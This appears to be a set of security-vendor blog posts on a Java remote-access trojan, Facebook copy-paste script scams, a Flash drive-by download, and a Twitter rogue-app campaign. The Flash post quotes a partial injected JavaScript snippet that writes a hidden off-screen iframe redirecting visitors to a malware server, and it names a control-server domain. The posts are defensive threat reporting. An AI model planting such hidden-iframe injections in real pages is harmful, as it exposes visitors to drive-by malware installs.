I Smell a RAT: Java Botnet Found in the Wild

Most of today’s malware works on Windows and its apps, because it can affect a lot of people around the world. However, other platforms are becoming more popular every day and attracting bad guys who are starting to create malicious code for other systems. (For a few examples, see BlackHoleRAT, HellRaiser RAT, and a fake-alert scam for Mac OS X.)

A further threat is cross-platform malware that can execute on Windows and Mac using Java; this type of malware can run in a multiplatform Java Virtual Machine. IncognitoRAT is one example of a Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms.

The original propagation vector of IncognitoRAT is a Windows executable, but apparently it was created using the tool JarToExe, which includes, among other features, the ability to convert .jar files into .exe files, to add program icons and version information, and protect and encrypt Java programs. The victim’s machine has to have the Java Runtime Environment installed and must be online. As soon as the file is executed, it starts downloading a ZIP file with a pack of Java-based libraries to perform several remote activities:

  • Java Registry Wrapper: Used to access the Windows Registry and create an entry in Software\Microsoft\Windows\CurrentVersion\Run to execute the malware every time the computer starts
  • Java Remote Control: To view and take remote control (keyboard and mouse) of an infected machine
  • JLayer – MP3 Library: To remotely play an MP3 file on the infected machine
  • RNP-VideoPlayer: To play videos remotely
  • JavaMail: Optional Java package to send stolen information to an email account
  • Freedom for Media Java: Open-source alternative to the official Java Media Framework; used by the malware to watch and record images from a remote webcam

In additional to those libraries, the downloader drops the following .jar components:

  • JavaUpdater.jar: Decrypts the directory (full path) that will be created by the malware to place all the components on the infected machine. It implements TripleDES encryption and decryption methods. Finally, the component executes the principal malware, server.jar, using the common instructions to run Java applications in Windows (java -jar %malwarepath%/Server.jar).
  • Server.jar: Runs in the background collecting keystrokes using a DLL designed to hook the keyboard on the infected machine. Also waits for commands sent from the control server to use the libraries described above and perform other actions, such as sending the captured keystrokes in a text file to an FTP server or an email account, viewing and recording the remote webcam, performing distributed denial –of-service attacks, taking remote control of the machine, etc.

One interesting feature of this botnet that we could not replicate during our analysis is its ability to “crash” the system. Apparently, it is a fake crash because in the dropped files we found a curious image that may appear on the infected machine:

According to public information, this malicious code is available for Windows, Mac OS X, and iPhone/iPad (the last only to control infected computers). However, we’ve seen only the PC version in a downloader/dropper in the wild. McAfee products detect this malware in our latest DATs as JV/IncognitoRAT.

Manual Script Scams on Facebook Generating Event Invitations

We know that Facebook scammers can be very creative and that they are experimenting with new ways to achieve their goals. Besides the omnipresent malicious Facebook apps that will steal the user’s permissions to post to his or her wall, we currently see a rise in the number of manual script attacks, with a few hundred thousand users falling victim daily.

The user is lured with a message as bait to a prepared site. The all time favourite “See who viewed your profile” is used a lot these days, but we have seen others with free credits for social games and the like. This landing page could be a Facebook page, a Facebook application page, or a remote site on some domain. It asks the user to copy some simple looking Javascript to the browser address bar and to click the ‘Enter’ key.

The scammers want to ensure sure that the users are not strained by the simple step by step instructions. That’s why, if you scroll down the page, they have actually created videos on YouTube that explain exactly how to copy and paste the Javascript code. For once, this video plays without fake surveys or hidden click-jacking attacks, but of course these tricks could be used as well.


Once the user follows the steps, he or she is redirected to the usual survey advertisement site before anything is revealed. These results, of course, will not be the real list of people that visited your profile, since this function does not exist in Facebook.

Under the hood, the previously executed Javascript code misuses the logged-in user session to enumerate the friends list and start its shenanigans. Depending on the configurations of the attacker, the script will post a new bait message to the user’s wall, send chat messages to friends, tag you in post messages or images, or even create an event and send an invitation to all your friends. Of course as always the attack is easy configurable through a toolkit. Since the script runs in the context of Facebook and uses your open session it can do a lot with your profile, it can do nearly everything you could do yourself.

The above described attacks are not new. We actually wrote about event spam and other attacks in our whitepaper on the risks of social networking last September.

But since they work and are harder to filter for Facebook, they might become more prevalent.

Of course, this is not a Facebook-specific problem; we have seen similar issues in other social networks. Their respective security teams are working hard to remove those attacks. Still, you should always be vigilant and sceptical when exploring social networks. Even messages from friends may lead to malicious content. If you are asked to install an application or copy and paste a script for no clear reason, then you’d better ignore it, since it is most likely a trap.

Note: We know that Facebook engineers have been working diligently on the self cross-site scripting problem. Not only have enforcement mechanisms been pursued to shutdown the malicious pages and fake accounts, but Facebook has also been putting affected users through educational checkpoints to help curb the spread of the attacks.

Drive-By Downloads Attack Adobe Zero-Day Flaw

Adobe released a security advisory warning the users of a zero-day vulnerability in Adobe Flash Player Versions and earlier. An exploit targeting this vulnerability was embedded inside Microsoft Excel documents and was used to deliver the malicious code to the victims. McAfee Labs performed a detailed technical analysis of the exploit and learned that the Flash Player object embedded inside the Excel document carried the malicious shellcode (shown below), which in turn loaded another Flash object to exploit the vulnerability via the classical heap-spray technique.

A couple of weeks ago we came across another variation in this attack via a drive-by download through a compromised web server.

In a drive-by download, a user visits a legitimate but infected web page and is redirected to a malicious server. Most of these infections are malicious iframes injected into a JavaScript exploit on the compromised web server, resulting in the malware installing itself onto the user’s machine. This is a common and widely known attack method.

A drive-by download usually goes like this:

During our investigation, we came across an Amnesty International website that was compromised with a JavaScript exploit appended at the end of the page. The page source looked like this:

This insertion will make the browser request the JavaScript exploit from the compromised server, which in turn contains the links to the malicious server.

Looking into the content of the JavaScript exploit, we see the embedded iframe source that redirects the browser to the malware-hosting web server, from which the exploit downloads the malicious Adobe Flash files.

.var e=new Date();e.setDate(e.getDate()+1);e.setHours(0,0,0);e.setTime(e.getTime());
..document.write(“<iframe frameborder=0 style=’position: absolute; top:-9999px;left:-9999px’ src=’
width=468 height=60 scrolling=no></iframe>“);

The browser then connects to this URL and downloads the exploit.html page.

This page was still alive during our investigation. Its contents looked like this:

Examining this JavaScript code, we can figure out that display.swf is the Flash object that contains the exploit code targeting the vulnerability. This code is embedded inside another Flash object. The file newsvine.jp2 is the actual backdoor binary, written in Visual Basic, which is first downloaded and then executed by the shellcode to exploit the vulnerability.

The browser makes this request to download newsvine.jp2.

Another GET request downloads the Flash object:

Next we see the Flash ActionScript that we decompiled from the Flash object. The highlighted part within the code is another embedded Flash object containing the exploit code.

While analyzing newsvine.jp2, we suspected this binary could have been authored in China due to the fact that resource section of this file has the locale ID of 2052, which maps to China.

The version information of swf.exe contains the string zchuang, which could be the author’s name.

Once executed the malware attempts to connect to the control server jeentern.dyndns.org on port 80.

McAfee protection

McAfee Intrusion Prevention (formerly IntruShield) has released coverage for the Adobe Flash zero-day download Trojan under the attack signature 0x402a1700-HTTP: Adobe Flash Drive By Download Trojan. McAfee customers with up-to-date installations are protected against this malware.

——– UPDATE ———–

To clarify – this exploits CVE-2011-0611 and NOT a new 0-day or new vulnerability. Sorry if the earlier lack of specificity caused any confusion!

Lord Gaga video banned? Twitter rogue app spread by scammers

Lord Voldermort and Lady GagaScammers are seeding an attack against Twitter users, posing as a banned video of “Lord Gaga” in an attempt to compromise accounts.

Using a selection of newly created Twitter accounts, which have the names and avatars of young women, the tweeted-out messages all look similar:

#pssst Lord Gaga VIDEO BANNED -----> [LINK] #onethingiveneverdone #cnn

Lord Gaga banned video tweets

The mention of “Lord Gaga” refers to a running-joke on Twitter today, about what would happen if Harry Potter villain Lord Voldermort and Lady Gaga hooked up. The hashtags, which can vary, appear to be taken from Twitter’s trending topics in an attempt to reach a wider audience.

Interestingly, in the above screenshot all of the Twitter profiles used to seed the scam campaign have adopted the names of women beginning with the letter “B”: Bianca, Berenice, Betania, and so forth..

It has been no surprise while writing this article to find that the scammers have now run out of “B” names and have moved onto female names beginning with the letter “C”..

These aren’t your usual Twitter profiles, and as can be seen in the example below, appear to be newly created specifically for the purposes of spreading the link.

Twitter attack seeder

What makes the profiles even more suspicious is that the only messages they have tweeted out so far have all been to the same place – a fake YouTube site, which pretends to host the banned video.

Lord Gaga video

Twitter’s security team would be wise to shut down the bogus profiles as soon as possible, before the attack spreads further because rather than playing a music video, clicking on the player will attempt to trick users into giving a rogue application the rights to access their Twitter account.

Would you authorise this Twitter app?

An app called “money works new” hardly sounds like it would be connected to a music video, and you would be wise not to give it access to your account. But, as we’ve seen in the past, Twitter users can be tricked by such an attack into making poor decisions.

Indeed, even Lady Gaga herself appears to have recently fallen foul of such a scam on Twitter.

If you do make the mistake of authorizing the app, the scammers won’t waste any time posting the same message from your account – hoping to entrap more victims.

Rogue app victim on Twitter

If you were unfortunate enough to grant a rogue applications access to your Twitter account, revoke its rights immediately by going to the Twitter website and visiting Settings/Connections and revoking the offending app’s rights.

Revoke app on Twitter

Don’t make it easy for scammers to make money in this way, and always exercise caution about which third party apps you allow to connect with your social networking accounts.

If you’re on Twitter and want to learn more about threats, be sure to follow Naked Security’s team of writers.